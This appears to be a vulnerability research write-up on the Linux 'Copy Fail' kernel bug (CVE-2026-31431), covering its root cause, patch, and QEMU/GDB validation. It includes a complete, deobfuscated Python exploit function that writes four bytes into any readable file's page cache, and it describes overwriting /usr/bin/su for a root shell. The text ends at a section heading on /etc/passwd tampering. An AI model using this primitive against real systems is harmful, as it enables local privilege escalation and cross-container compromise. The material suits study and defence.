Copy Fail Deep Dive(CVE-2026-31431): Root Cause, Exploitation, and Detection of a Linux Page Cache Vulnerability

1. Introduction

In late April 2026, security researcher Taeyang Lee publicly disclosed a Linux kernel vulnerability assigned CVE-2026-31431 and gave it an ironic name: Copy Fail.

The name captures the essence of the bug. In 2017, a kernel developer fixed an AF_ALG crypto-interface bug where AAD was not copied from src to dst. The fix introduced an in-place optimization. The optimization was reasonable by itself, but it unintentionally broke a long-standing implicit assumption in another module of the kernel crypto subsystem, authencesn: the destination buffer is contiguous kernel memory, and writing a few bytes into it has no side effects.

When these two independent subsystems meet the Page Cache through splice(), an unprivileged local user can write four controlled bytes into the page cache of any readable file on the system.

This is not a conventional out-of-bounds write or use-after-free. Its impact is more subtle and more far-reaching:

  • Local privilege escalation: repeated writes can overwrite the ELF header of /usr/bin/su and lead to a root shell.
  • Zero-privilege cross-container attack: containers in different namespaces on the same host can share the page cache for image layers, allowing one container to corrupt binaries used by another container.
  • Read-only mount bypass: the target file only needs to be opened with O_RDONLY; a read-only volume no longer prevents page-cache modification.
  • Default security controls fail to stop it: the default Docker/Kubernetes seccomp profile and the SELinux targeted policy do not block exploitation.

The vulnerability affects mainstream Linux distribution kernels released between 2017 and 2026 and remained latent for almost nine years. It is rated CVSS 7.8 High.

Timeline

Date Event
2011 The authencesn module was introduced. The ESN scratch write was harmless in its original usage.
2015 AF_ALG gained AEAD and splice support, but still used an out-of-place design.
2017-07 Commit 72548b093ee3 introduced the in-place optimization and created the vulnerable behavior.
2026-03-23 The bug was reported to the Linux kernel security team.
2026-04-01 Patch a664bf3d603d was merged into mainline.
2026-04-22 CVE-2026-31431 was assigned.
2026-04-29 Public disclosure.
2026-05-01 CISA added the issue to the KEV catalog, with a remediation due date of 2026-05-15.
2026-05-04 Docker 29.4.2 changed the default seccomp behavior to block AF_ALG; RHEL 9 and 10 kernel fixes were released.
2026-05-06 Docker 29.4.3 fixed the 29.4.2 regression and switched to AppArmor/SELinux enforcement for AF_ALG; RHEL 8 fixes were released.
2026-05-07 Dirty Frag, affecting ESP/RxRPC subsystems with a similar primitive, was publicly disclosed.

This article starts with the background needed to understand the trigger path, then walks through root cause analysis, PoC behavior, and kernel-level dynamic validation. It then systematically explores host privilege-escalation paths and container attack scenarios, including their practical boundaries. The final sections cover mitigation and a page-cache integrity detection design based on O_DIRECT and fanotify.


2. Background

Understanding Copy Fail requires several kernel concepts. Their dependencies can be summarized as follows:

Scatterlist (SGL)    AEAD Crypto            Page Cache
     |                |       |                |
scatterwalk          AAD  authencesn        splice()
     |                |       |                |
     +--------+-------+       |                |
              |               |                |
          AF_ALG -------------+                |
              |                                |
          algif_aead --------------------------+

We will go through them one by one.

2.1 Page Cache: Linux's Global File Cache

When a process reads /usr/bin/cat through read(), the kernel does not fetch the data from disk every time. It first checks a memory area called the Page Cache. If the corresponding file page is already cached, the kernel returns the cached data directly.

Several Page Cache properties are directly relevant to this vulnerability:

Globally shared. The Page Cache is indexed by (inode, page_offset). It does not belong to any specific process. All processes on the same machine that access the same inode hit the same page-cache entry. After process A loads a file into the page cache through read(), process B reads the same file from cache without touching disk again.

Writeback semantics. For modifications made through the normal write() path, the kernel marks the page as dirty and later writes it back to disk through the writeback mechanism. If a kernel path bypasses the VFS layer and directly modifies a page-cache page, the dirty bit is not set. The modification only lives in memory and disappears after reboot or after the page is dropped from cache.

Immediate visibility. Once a page-cache page is modified, later read() calls immediately see the modified content, regardless of how that modification happened. This includes other processes on the same host and, in container environments, processes that share the same lower-layer inode through overlayfs. Section 6.1 covers that in detail.

Page Cache architecture

2.2 Scatterlist: Scatter-Gather Lists

Inside the kernel, logically contiguous data, such as a 10 KB encryption payload, is often stored across multiple non-contiguous physical 4 KB pages. To describe which pages and offsets make up that logical data range, the kernel uses scatterlists (SGLs).

Each struct scatterlist entry describes a contiguous physical memory range:

struct scatterlist {
    unsigned long   page_link;  // pointer to struct page, or CHAIN to another SGL array
    unsigned int    offset;     // starting offset inside the page
    unsigned int    length;     // data length
};

When a single SGL array is not enough, multiple arrays can be connected through SG_CHAIN. The final entry no longer points to a data page; instead, its page_link points to the start of another SGL array. The scatterwalk iterator hides this linked structure from callers.

The design is sound by itself. The problem appears when some entries in the SGL do not point to ordinary kernel-allocated memory but to pages in the page cache. A write to such an SGL entry is equivalent to directly modifying cached file content. That is the core exploitation point in Copy Fail.

Scatterlist layout

2.3 splice: The Cost of Zero Copy

splice() is a high-performance Linux data-transfer system call. Its main idea is to avoid copying data back and forth between kernel space and user space. Instead, it moves page references between kernel pipe buffers.

A normal read() plus write() flow copies file data into a user-space buffer and then copies it back into the kernel for the destination. splice() directly transfers references to the file's page-cache pages to the other side of a pipe, without copying the data itself.

splice zero-copy comparison

In the AF_ALG crypto interface, splice() can feed file content directly into a crypto algorithm. The file's page-cache pages are placed directly into the TX SGL. The page_link fields in those SGL entries point to globally shared page-cache pages. This is the critical design decision: if any later code path writes to that SGL, it writes to the file's page cache.

2.4 AF_ALG: User-Space Crypto Interface

The Linux kernel exposes a crypto API to user space through AF_ALG (Address Family: Algorithm). The API is socket-based:

import socket, os

AF_ALG = 38
SOL_ALG = 279

# 1. Create an AF_ALG socket and choose the crypto algorithm.
alg_sock = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
# Bind the algorithm name, for example an AEAD algorithm such as gcm(aes).
alg_sock.bind(("aead", "gcm(aes)"))
alg_sock.setsockopt(SOL_ALG, 1, key_bytes)    # ALG_SET_KEY
alg_sock.setsockopt(SOL_ALG, 4, None, 16)     # ALG_SET_AEAD_AUTHSIZE

# 2. accept() returns an operation socket.
op_sock = alg_sock.accept()[0]

# 3. sendmsg() sends data to be encrypted or decrypted.
# Control messages specify operation type, IV, AAD length, and other parameters.
op_sock.sendmsg([plaintext_data], control_messages)

# 4. recv() receives the result. The kernel performs the actual crypto operation here.
result = op_sock.recv(output_buffer_size)

AF_ALG also supports feeding file content to a crypto algorithm through splice(), avoiding copies between kernel space and user space. This feature is essential to the Copy Fail exploit chain: the data that enters through splice is stored in the TX SGL as page-cache page references, not as copied bytes.

In the kernel, algif_aead.c handles AEAD requests. It manages the TX SGL, which contains data sent by the user, and the RX SGL, which points to the user's receive buffer. It eventually calls a lower-level crypto algorithm, such as authencesn, to perform the actual encryption or decryption.

2.5 AEAD and authencesn's Scratch Write

AEAD stands for Authenticated Encryption with Associated Data. It provides confidentiality and integrity at the same time. Its data format is:

Input:   AAD (Associated Data) || Ciphertext || Auth Tag
Output:  AAD || Plaintext

AAD is associated data that is not encrypted but is authenticated. Ciphertext is the encrypted data, and Auth Tag is the authentication tag.

authencesn is an AEAD implementation in the Linux kernel. Its full name is "authenc with Extended Sequence Number". It was designed for IPsec ESN.

What AAD means

In AEAD, AAD is additional data that must be authenticated but does not need to be encrypted. In TLS, AAD can be the record header: content type, protocol version, and length. In IPsec, AAD includes the security parameter index and sequence number. The concrete content varies by protocol, but the AEAD layer only needs to know that the first assoclen bytes are AAD.

Why authencesn writes into the dst buffer

The ESN protocol uses a 64-bit sequence number to prevent wraparound attacks. Only the low 32 bits are transmitted on the wire; the high 32 bits are maintained locally by the peers. authencesn needs the full 64-bit sequence number during HMAC computation. It handles this as follows:

  1. Put the high 32 bits of the sequence number in AAD[4:8].
  2. Before calculating HMAC, temporarily write AAD[4:8] into the place in the destination buffer where the auth tag normally resides, so the HMAC covers the full sequence number.
  3. Restore state after HMAC calculation.

This temporary write is the ESN scratch write:

// crypto/authencesn.c - crypto_authenc_esn_decrypt()

// Read the first eight bytes from AAD.
scatterwalk_map_and_copy(tmp, req->dst, 0, 8, 0);
// In the IPsec case: tmp[0] = SPI, tmp[1] = SeqNo_Hi

unsigned int cryptlen = req->cryptlen;
cryptlen -= authsize;  // locate the beginning of the auth-tag area

// Temporarily write AAD[4:8] into the tag area in dst for HMAC calculation.
scatterwalk_map_and_copy(tmp + 1, req->dst, assoclen + cryptlen, 4, 1);
//                       ^^^^^^^^                                ^
//                    AAD[4:8]                               4 bytes, 1 = write

The write size is hard-coded to four bytes (sizeof(u32)), and the value comes from AAD[4:8].

In normal IPsec usage, req->dst points to a contiguous buffer allocated by the kernel with kmalloc, and AAD[4:8] is legitimate sequence-number data. The temporary write and restoration are harmless.

The attack surface opened by AF_ALG

Through AF_ALG, however, user space can directly invoke the authencesn algorithm and fully control the AAD content. authencesn does not validate whether AAD[4:8] is a real ESN sequence number. It simply writes these four bytes into a fixed offset of dst.

If the attacker places the desired page-cache bytes in AAD[4:8], authencesn faithfully writes them to a fixed offset of dst.

The obvious question is: what if req->dst does not contain a kmalloc buffer, but page-cache pages?


3. Root Cause Analysis

3.1 How the Vulnerability Was Introduced: A Reasonable Optimization

In July 2017, kernel developer Stephan Mueller submitted commit 72548b093ee3, titled "crypto: algif_aead - copy AAD from src to dst".

The commit fixed a real bug. Before this change, the algif_aead decryption path used an out-of-place mode:

// Before 2017: out-of-place
aead_request_set_crypt(&areq->aead_req,
                       areq->tsgl,              // req->src = TX SGL (input data)
                       areq->first_rsgl.sgl.sg, // req->dst = RX SGL (user receive buffer)
                       used, ctx->iv);

The TX SGL contained all data sent through sendmsg() and splice(): AAD, ciphertext, and authentication tag. The RX SGL pointed to the user-space receive buffer. The AEAD specification requires the decrypted output to include AAD, but lower-level algorithms only process the ciphertext. The caller must copy AAD from src to dst. The old algif_aead code did not do that, so the AAD area in the user's output was zeroed.

Commit 72548b093ee3 fixed this in three steps:

  1. Copy AAD and ciphertext from TX SGL to the RX buffer using memcpy_sglist, so AAD appears in the output.
  2. Chain the TX SGL pages that contain the auth tag to the tail of the RX SGL through sg_chain(), because AEAD decryption still needs the tag for authentication, even though the tag is not part of the output.
  3. Set req->src = req->dst = RX SGL, where the RX SGL now contains AAD, ciphertext, and the chained tag pages.
// Vulnerable code after 2017: in-place
// Step 1: copy AAD + ciphertext into the RX buffer
memcpy_sglist(rsgl, tsgl_src, outlen);  // outlen = assoclen + cryptlen - authsize

// Step 2: pull tag pages from the TX SGL
af_alg_pull_tsgl(sk, processed, areq->tsgl, processed - as);
// Step 3: chain them to the tail of the RX SGL
sg_chain(rsgl_sg, rsgl_nents, areq->tsgl);

// Step 4: in-place, src and dst both point to the combined RX SGL
aead_request_set_crypt(&areq->aead_req,
                       rsgl_src,   // req->src = RX SGL, including chained tag pages
                       rsgl_dst,   // req->dst = RX SGL, the same object
                       used, ctx->iv);

Functionally, this solved the AAD copy bug. The problem is in the tag pages pulled in Step 2. They come from the TX SGL, and data that entered the TX SGL through splice() directly references file page-cache pages. These page-cache pages are now chained into req->dst.

3.2 Conflicting Design Assumptions

The essence of the bug is an implicit assumption conflict between two subsystems:

Subsystem Assumption
authencesn (2011) req->dst is a contiguous kmalloc buffer, so a scratch write has no side effects.
algif_aead optimization (2017) The tail of req->dst may contain page-cache pages chained from the TX SGL.

In every other authencesn call path, mainly IPsec/xfrm, dst is indeed a kernel-allocated contiguous buffer. The algif_aead in-place optimization was the first, and effectively the only, path that could place page-cache pages inside the req->dst SGL.

3.3 Complete Trigger Path

Complete Copy Fail trigger path

Now let us walk through the whole trigger sequence. Assume the goal is to write four controlled bytes at offset t in a target file.

Step 1: user space sends data

The exploit uses the following parameters:

  • assoclen = 8, specified through the control message passed to sendmsg.
  • authsize = 4, set through setsockopt(ALG_SET_AEAD_AUTHSIZE).

Then data is sent to the AF_ALG socket in two stages:

# Four bytes to write.
evil_bytes = b'\xde\xad\xbe\xef'

# Step 1: send eight bytes of AAD through sendmsg.
# AAD[0:4] = arbitrary padding, AAD[4:8] = bytes to write to the page cache.
# authencesn will treat AAD[4:8] as ESN seqno_lo and write it to the scratch area.
aad = b'\x00\x00\x00\x00' + evil_bytes   # 8 bytes
op.sendmsg([aad], cmsg, MSG_MORE)  # MSG_MORE means more data follows.

# Step 2: splice the first t + 4 bytes of the target file into the AF_ALG socket.
# splice passes page-cache page references without copying data.
pipe_r, pipe_w = os.pipe()
target_fd = os.open("/usr/bin/su", os.O_RDONLY)
os.splice(target_fd, pipe_w, t + 4, offset_src=0)  # file -> pipe
os.splice(pipe_r, op.fileno(), t + 4)              # pipe -> AF_ALG socket

Step 2: TX SGL layout

After the two sends, the kernel's TX SGL contains:

TX SGL:
+--------------------+----------------------------------------+
| sendmsg data (8B)  | splice data (t+4 bytes)                |
| AAD: 4 zero bytes  | file[0:t+4]                            |
|      + evil_bytes  | page-cache page refs via splice        |
|  (kmalloc memory)  | (points to GLOBAL SHARED page cache)   |
+--------------------+----------------------------------------+

From AEAD decryption's point of view, this data is interpreted as:

  • AAD = the first assoclen=8 bytes = four zero bytes plus evil_bytes from sendmsg.
  • Ciphertext = the middle t bytes = file[0:t].
  • Auth Tag = the final authsize=4 bytes = file[t:t+4].

Total byte count is 8 + t + 4 = t + 12.

Step 3: recv triggers decryption and in-place SGL construction

Calling recv() triggers _aead_recvmsg(). The vulnerable code does the following:

outlen = assoclen + (cryptlen - authsize) = 8 + ((t+4) - 4) = t + 8

(1) memcpy_sglist(RX buffer, TX SGL, outlen=t+8):
    Copy first t+8 bytes of TX SGL to the RX buffer (user-space allocated memory).
    RX buffer contents:
      [0:8]   = copy of AAD (sendmsg data)
      [8:8+t] = copy of file[0:t] (ciphertext portion)
    Note: this is a DATA COPY, not a page reference.

(2) af_alg_pull_tsgl(TX SGL, skip=t+8, take=4):
    Skip the first t+8 bytes of TX SGL and extract the final 4 bytes (tag region).
    These four bytes correspond to file[t:t+4] from splice.
    -> SGL entry: { page = file's page-cache page, offset = t % 4096, length = 4 }
    -> This is the ORIGINAL page-cache reference, not a copy.

(3) sg_chain(RX SGL tail, tag SGL):
    Chain the tag page reference to the end of RX SGL.

The final combined destination SGL, which is also the source SGL, looks like this:

combined dst SGL (= req->src = req->dst):

+-- RX buffer (user-space, safe) ---+  +-- chained tag (PAGE CACHE) ------+
|                                  |  |                                  |
| AAD (8B) | ciphertext (tB)       |->| file[t:t+4] in page cache        |
|          | = copy of file[0:t]   |  | original page ref from splice    |
|                                  |  |                                  |
+-- offset 0              t+8 -----+  +-- offset t+8              t+12 --+

The key point is that the RX-buffer portion is safe user memory allocated by the kernel, but the chained tag pages at the tail are original page-cache references from the file.

Step 4: authencesn scratch write hits the page cache

crypto_authenc_esn_decrypt() starts running. The destination offset for the ESN scratch write is computed as follows:

// scratch write in crypto_authenc_esn_decrypt()

// First read AAD[0:8].
scatterwalk_map_and_copy(tmp, req->dst, 0, 8, 0);  // tmp[0]=AAD[0:4], tmp[1]=AAD[4:8]

unsigned int cryptlen = req->cryptlen;  // = t + 4, ciphertext plus tag
cryptlen -= authsize;                   // = t + 4 - 4 = t

// Write tmp[1] (= AAD[4:8] = evil_bytes) into dst[assoclen + cryptlen].
scatterwalk_map_and_copy(tmp + 1, req->dst, assoclen + cryptlen, 4, 1);
//                       ^^^^^^^^                  ^^^^^^^^^^^^^^^^  ^
//                    = AAD[4:8]                   = 8 + t          write direction
//                    = evil_bytes

The write position is offset 8 + t in the destination SGL. Comparing that with the combined SGL layout above:

  • The RX-buffer portion occupies [0, t+8), for a total of t+8 bytes.
  • The chained tag pages start at offset t+8.

Therefore, 8 + t is exactly the boundary of the RX buffer and the start of the chained tag pages.

Those tag pages are original page-cache references to file[t:t+4]. The scratch write therefore writes four bytes to offset t of the file's page cache.

The written value is tmp[1] = AAD[4:8] = evil_bytes, supplied through sendmsg.

At this point the chain is complete: the write offset is controlled by the splice() length, which determines t, and the write content is controlled by AAD[4:8] from sendmsg. Both are freely controlled from user space.

Why the write is not undone

After decryption, crypto_authenc_esn_decrypt_tail() attempts to restore data overwritten by the scratch write. The critical detail is that it first reads the current value at dst[8+t], which is already the payload, and then writes AAD back to dst[0:8]. It never writes the original value back to dst[8+t].

The HMAC verification will fail because the data has been modified, and recvmsg returns -EBADMSG. But the page-cache write has already happened and is not rolled back. An exploit simply ignores this error.

3.4 Control Analysis

Write offset. The attacker controls t by adjusting the splice() length, which is t + authsize = t + 4. Each invocation can target an arbitrary file offset.

Write value. The attacker fully controls AAD[4:8], sent through sendmsg.

Write size. The write size is fixed at four bytes. It is not controlled by setsockopt(ALG_SET_AEAD_AUTHSIZE). authsize only affects the offset calculation through cryptlen -= authsize. The four-byte size is hard-coded in authencesn as sizeof(u32), the size of the high 32 bits of the ESN sequence number. A single call cannot change the size, but repeated calls can overwrite a continuous file range.

Target file. Any file the current user can read is a target. The PoC opens the file with O_RDONLY. No write permission is required because the write path bypasses VFS permission checks.

Summary:

Write target: file page cache[t : t+4]
Write value:  AAD[4:8] sent through sendmsg (4 bytes, fully controlled)
Write size:   fixed 4 bytes (u32 hard-coded in authencesn)
Trigger:      assoclen=8, authsize=4, splice length=t+4
Permission:   O_RDONLY is enough; no write permission required
Root cause:   chained tag pages at the tail of dst SGL are original page-cache references from splice

3.5 Patch Analysis

The fix, commit a664bf3d603d, states:

This mostly reverts commit 72548b093ee3 except for the copying of the associated data. There is no benefit in operating in-place in algif_aead since the source and destination come from different mappings.

The fix removes in-place mode and makes req->src and req->dst point to different SGLs again:

// After the fix: out-of-place
// src = TX SGL, which may contain page-cache pages, but is read-only
// dst = RX SGL, a pure user-space buffer
aead_request_set_crypt(&areq->aead_req,
                       tsgl_src,   // req->src = TX SGL
                       rsgl_dst,   // req->dst = RX SGL, independent
                       used, ctx->iv);

// AAD is explicitly copied into the RX buffer.
memcpy_sglist(rsgl_src, tsgl_src, ctx->aead_assoclen);

After the fix, req->dst only contains the user's RX buffer. It no longer contains page-cache pages. The authencesn scratch write lands in the user's receive buffer and has no security impact.

The patch removes roughly 92 lines of code: tag-page chaining, the in-place branch, the offset parameter added to af_alg_pull_tsgl, and other complexity needed only for in-place operation. The sg_chain() call is eliminated completely, so page-cache pages no longer have a path into req->dst.


4. PoC Analysis and Dynamic Validation

4.1 Public PoC Structure

The public Copy Fail PoC is a heavily obfuscated 732-byte Python script. It nests the real exploit code through base64 and zlib compression. After deobfuscation, the core is a function named page_cache_write_4bytes(fd, offset, value), which executes the trigger path described above and writes four bytes to the page cache of the file represented by fd.

The full PoC flow is:

  1. Open /usr/bin/su, a SUID-root binary, as read-only.
  2. Repeatedly call page_cache_write_4bytes() to overwrite the first 160 bytes of /usr/bin/su's ELF header with a carefully constructed ELF payload containing shellcode for a root shell.
  3. Execute the modified /usr/bin/su and obtain a root shell.

One important detail is that the PoC opens the target with O_RDONLY. Normal VFS writes through a read-only file descriptor would be rejected by the kernel. Copy Fail does not use the VFS write path; it writes to page-cache pages through the crypto subsystem's scratch write. Therefore any readable file is a potential target, including files mounted read-only.

4.2 Core Function

The deobfuscated core function, aligned with the data flow in Section 3, is:

AF_ALG = 38
SOL_ALG = 279
ASSOCLEN = 8    # AAD length
AUTHSIZE = 4    # auth-tag size; also affects offset calculation

def page_cache_write_4bytes(fd, offset, value):
    """Write value (4 bytes) to page_cache[offset : offset+4] of the file represented by fd."""

    # Create an AF_ALG socket and bind authencesn(hmac(sha256),cbc(aes)).
    s = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
    s.setsockopt(SOL_ALG, 2,  # ALG_SET_KEY: all-zero key, content does not affect the trigger
                 b'\x08\x00\x01\x00'    # rtattr header
                 b'\x00\x00\x00\x10'    # enckeylen=16 (AES-128)
                 + b'\x00' * 32)         # 16B authkey + 16B enckey
    s.setsockopt(SOL_ALG, 4, None, AUTHSIZE)  # ALG_SET_AEAD_AUTHSIZE = 4

    op = s.accept()[0]

    # Build 8 bytes of AAD: first 4 bytes are zero padding, last 4 bytes are the value.
    # authencesn writes AAD[4:8] (= value) to dst[assoclen + cryptlen].
    aad = b'\x00' * 4 + value   # 8 bytes
    op.sendmsg([aad],
               [(SOL_ALG, 2, b'\x00' * 4),              # ALG_OP_DECRYPT
                (SOL_ALG, 3, b'\x10' + b'\x00' * 19),   # IV = 16 zero bytes
                (SOL_ALG, 4, struct.pack('I', ASSOCLEN))], # assoclen = 8
               socket.MSG_MORE)

    # splice target file [0, offset+4) into the AF_ALG socket.
    # splice passes page-cache page references without copying.
    pr, pw = os.pipe()
    os.splice(fd, pw, offset + AUTHSIZE, offset_src=0)
    os.splice(pr, op.fileno(), offset + AUTHSIZE)

    try:
        op.recv(ASSOCLEN + offset)  # triggers _aead_recvmsg -> authencesn scratch write
    except OSError:
        pass  # HMAC failure returns EBADMSG, but the page-cache write has completed
    op.close(); s.close(); os.close(pr); os.close(pw)

4.3 QEMU and GDB Kernel-Level Validation

To validate the full trigger path at kernel level, I built a controlled debugging environment: Linux 6.12.8 with debug symbols running inside QEMU, with GDB connected remotely and breakpoints placed on key functions to capture the complete execution chain.

Experiment code

The scripts and configuration files for this section are in the QEMU debug environment package. The GDB breakpoint scripts are separate. URL links have been intentionally removed from this blog version.

4.3.1 Building the Debug Environment

The debug environment is built through Docker to avoid setting up a cross-compilation toolchain on macOS. It produces three files: a compressed kernel bzImage, a debug-symbol vmlinux, and an initramfs containing BusyBox and the PoC utility.

# Build kernel + BusyBox + PoC through Docker. This takes about ten minutes.
docker build -t copyfail-build -f Dockerfile .
docker run --rm -v $(pwd)/output:/output copyfail-build

# Outputs:
#   output/bzImage        - compressed kernel (4.8 MB)
#   output/vmlinux        - DWARF debug symbols (126 MB), used by GDB
#   output/rootfs.cpio.gz - initramfs, including BusyBox and poc_pagecache_write

Key kernel configuration options:

CONFIG_CRYPTO_USER_API_AEAD=y    # AF_ALG AEAD interface
CONFIG_CRYPTO_AUTHENC=y          # authenc module
CONFIG_CRYPTO_SEQIV=y            # sequence-number IV
CONFIG_DEBUG_INFO_DWARF5=y       # full debug symbols
CONFIG_GDB_SCRIPTS=y             # GDB helper scripts
CONFIG_KALLSYMS_ALL=y            # expose all kernel symbols

Start the QEMU VM:

# Normal mode: boot directly into a shell.
./run_qemu.sh

# Debug mode: QEMU pauses and waits for GDB on :1234.
./run_qemu.sh debug

Connect from another terminal:

gdb ./vmlinux -ex 'target remote :1234' -ex 'continue'

4.3.2 Experiment 1: Verifying Page-Cache Writes

Inside the QEMU VM shell, run the automated experiment:

# === inside the VM ===

# 1. Create a test file.
echo "AABBCCDD EEFFGGHH IIJJKKLL MMNNOOPP" > /tmp/target.txt
hexdump -C /tmp/target.txt
# 00000000  41 41 42 42 43 43 44 44  20 45 45 46 46 47 47 48  |AABBCCDD EEFFGGH|
# 00000010  48 20 49 49 4a 4a 4b 4b  4c 4c 20 4d 4d 4e 4e 4f  |H IIJJKKLL MMNNO|
# 00000020  4f 50 50 0a                                        |OPP.|

# 2. First write: offset 0, value 0xDEADBEEF.
poc_pagecache_write /tmp/target.txt 0 0xDEADBEEF
# [*] Target: /tmp/target.txt
# [*] Offset: 0 (0x0)
# [*] Value:  0xdeadbeef
# [*] Writing 4 bytes to page cache...
# [+] Done. Page cache of /tmp/target.txt at offset 0 should now contain 0xdeadbeef

# 3. Verify the result.
hexdump -C /tmp/target.txt | head -2
# 00000000  ef be ad de 43 43 44 44  20 45 45 46 46 47 47 48  |....CCDD EEFFGGH|
#           ^^^^^^^^^^^
#           0xDEADBEEF (little-endian)

# 4. Second write: offset 8, value 0xCAFEBABE.
poc_pagecache_write /tmp/target.txt 8 0xCAFEBABE

# 5. Verify that the two writes do not interfere with each other.
hexdump -C /tmp/target.txt | head -2
# 00000000  ef be ad de 43 43 44 44  be ba fe ca 46 47 47 48  |....CCDD....FGGH|
#                                    ^^^^^^^^^^^
#                                    0xCAFEBABE (little-endian)

# 6. Verify drop_caches behavior. Files on tmpfs do not revert.
echo 3 > /proc/sys/vm/drop_caches
hexdump -C /tmp/target.txt | head -2
# 00000000  ef be ad de 43 43 44 44  be ba fe ca 46 47 47 48  |....CCDD....FGGH|
# On tmpfs: data only lives in page cache, and drop_caches does not evict it.
# On disk filesystems such as ext4: drop_caches reloads the original data from disk.

Conclusion: the four-byte page-cache write primitive works. The offset is precise, and repeated writes do not interfere with each other.

4.3.3 Experiment 2: GDB Evidence Chain, SGL Layout, and Scratch Write

This is the most important validation step. GDB observes req->src == req->dst at the entry of crypto_authenc_esn_decrypt, proving that the vulnerable in-place path is active, and then traces the write operation in scatterwalk_map_and_copy until it lands on a page-cache page.

# === terminal 1: start QEMU in debug mode ===
./run_qemu.sh debug
# === Debug mode: QEMU paused, waiting for GDB on localhost:1234 ===

# === terminal 2: connect GDB and load the Python breakpoint script ===
gdb ./vmlinux -x exp3_2_gdb.py
# [GDB Script] Setting up breakpoints for Experiment 3.2+3.3...
# Breakpoint 1 at 0xffffffff812984f8: file crypto/authencesn.c, line 263.
# [GDB] BP1: crypto_authenc_esn_decrypt (entry)
# Breakpoint 2 at 0xffffffff8128f93e: file crypto/scatterwalk.c, line 57.
# [GDB] BP2: scatterwalk_map_and_copy (writes only)

(gdb) target remote :1234
(gdb) continue

After running poc_pagecache_write /tmp/target.txt 0 0xDEADBEEF inside the VM, GDB captures the following output:

============================================================
=== crypto_authenc_esn_decrypt ENTRY ===
  req       = 0xffff888002d96a90
  req->src  = 0xffff888002d96820
  req->dst  = 0xffff888002d96820
  src == dst: YES (IN-PLACE!)          <- root cause confirmed
  assoclen  = 8
  cryptlen  = 4 (before -= authsize)
============================================================
  --- dst SGL entries ---
  SGL[0]: page_link=0xffffea000006f440 offset=1760 length=8
  SGL[1]: page_link=0xffff8880027cbda1 offset=0 length=0 [CHAIN]
  SGL[2]: page_link=0xffffea000006f8c2 offset=0 length=4 [LAST]

=== [HIT 1] scatterwalk_map_and_copy WRITE ===
  buf=0xffffc90000113d20 sg=0xffff888002d96820 start=4 nbytes=4
  writing value: 0x41414141
  backtrace:
    #0 scatterwalk_map_and_copy
    #1 crypto_authenc_esn_decrypt      <- seqno_hi written to dst[4..7]
    #2 _aead_recvmsg
    #3 aead_recvmsg
    #4 sock_recvmsg_nosec
    #5 sock_recvmsg

=== [HIT 2] scatterwalk_map_and_copy WRITE ===
  buf=0xffffc90000113d24 sg=0xffff888002d96820 start=8 nbytes=4
  writing value: 0xdeadbeef            <- scratch write hits page cache
  backtrace:
    #0 scatterwalk_map_and_copy
    #1 crypto_authenc_esn_decrypt      <- dst[assoclen+cryptlen] = dst[8+0] = page cache
    #2 _aead_recvmsg
    ...

=== [HIT 3] scatterwalk_map_and_copy WRITE ===
  buf=0xffffc90000113cc8 sg=0xffff888002d96820 start=0 nbytes=8
  writing value: 0x41414141
  backtrace:
    #0 scatterwalk_map_and_copy
    #1 crypto_authenc_esn_decrypt_tail <- ESN header restore after HMAC cleanup
    ...

Key interpretation:

Field Meaning
src == dst: YES Confirms in-place mode introduced by 72548b093ee3.
SGL[1]: [CHAIN] sg_chain() linked tag pages to the RX SGL.
SGL[2]: offset=0 length=4 [LAST] The tag page is the file's page-cache page at offset 0.
HIT 2: value=0xdeadbeef start=8 The scratch write targets dst[8], exactly the start of the chained tag page.

The SGL layout and call chain are fully captured: recv() -> _aead_recvmsg -> crypto_authenc_esn_decrypt -> scatterwalk_map_and_copy(WRITE) -> page cache.

4.3.4 Experiment 3: Comparing with the Patched Kernel

Under the same environment, boot a 6.12.85 kernel containing patch a664bf3d603d and repeat the experiment:

# Start with the patched kernel.
BZIMAGE=bzImage.patched VMLINUX=vmlinux.patched ./run_qemu.sh debug

GDB output after the fix:

============================================================
=== crypto_authenc_esn_decrypt ENTRY ===
  req       = 0xffff888002dcea90
  req->src  = 0xffff888002e6d880
  req->dst  = 0xffff888002dce820
  src == dst: NO                       <- fixed: out-of-place mode
  assoclen  = 8
  cryptlen  = 4 (before -= authsize)
============================================================
  --- dst SGL entries ---
  SGL[0]: page_link=0xffffea000006f582 offset=1760 length=8 [LAST]
                                                              ^^^^
  Only one entry: no CHAIN and no page-cache page.

=== [HIT 1] scatterwalk_map_and_copy WRITE ===
  writing value: 0x41414141
  sg->page_link = 0xffffea000006f582   <- RX buffer, safe

=== [HIT 2] scatterwalk_map_and_copy WRITE ===
  writing value: 0xdeadbeef
  sg->page_link = 0xffffea000006f582   <- RX buffer again, harmless
Item Vulnerable kernel (6.12.8) Patched kernel (6.12.85)
src == dst Yes, in-place No, out-of-place
dst SGL entries 3 entries, including CHAIN and a page-cache page 1 entry, RX buffer only
scratch-write target page-cache page RX buffer
page cache after execution modified unchanged

5. A Recurring Vulnerability Pattern: Page-Cache Overwrite

Dirty Pipe in 2022, Copy Fail in 2026, and the later Dirty Frag bugs share a clear pattern: splice() zero-copy injects file page-cache page references into a kernel subsystem, and a code path in that subsystem writes to those references. The concrete writes differ: pipe merge, crypto scratch write, and in-place decrypt. The result is the same: file page cache is modified without going through the VFS write path.

Vulnerability Year Mechanism Deterministic write Page-cache only
Dirty Pipe (CVE-2022-0847) 2022 pipe flag initialization bug plus splice Yes Yes
Copy Fail (CVE-2026-31431) 2026 AF_ALG in-place optimization plus splice Yes Yes
Dirty Frag (CVE-2026-43284/43500) 2026 xfrm-ESP / RxRPC in-place decryption plus splice Yes Yes

Their trigger paths differ, but the core result is shared: a kernel path bypasses VFS write-permission checks and directly modifies file page-cache content through page references injected by splice. Because the modification does not pass through the VFS write path, the page is not marked dirty. The original file on disk is unaffected. The tampering exists only in memory and disappears after reboot or drop_caches.

Page cache overwrite vulnerability family

The older Dirty COW vulnerability achieved a similar unauthorized file-data modification through a different mechanism: an mmap copy-on-write race plus GUP. Dirty COW does not involve splice or in-place operation. After the race succeeds, the modified page is marked dirty and written back to disk. It is a different class of bug.

Once the primitive is equivalent, the exploitation surface is also similar. The following sections use Copy Fail as the example primitive: a four-byte controlled write to the page cache of any readable file. All paths below were experimentally confirmed on CentOS Stream 8 with an unpatched 4.18.0-553 kernel, and the conclusions apply to page-cache overwrite bugs of the same class.

Experiment code

The PoC scripts for host attacks are part of the page-cache guard experiment set. URL links have been removed from this blog version.

5.1 /etc/passwd UID Tampering

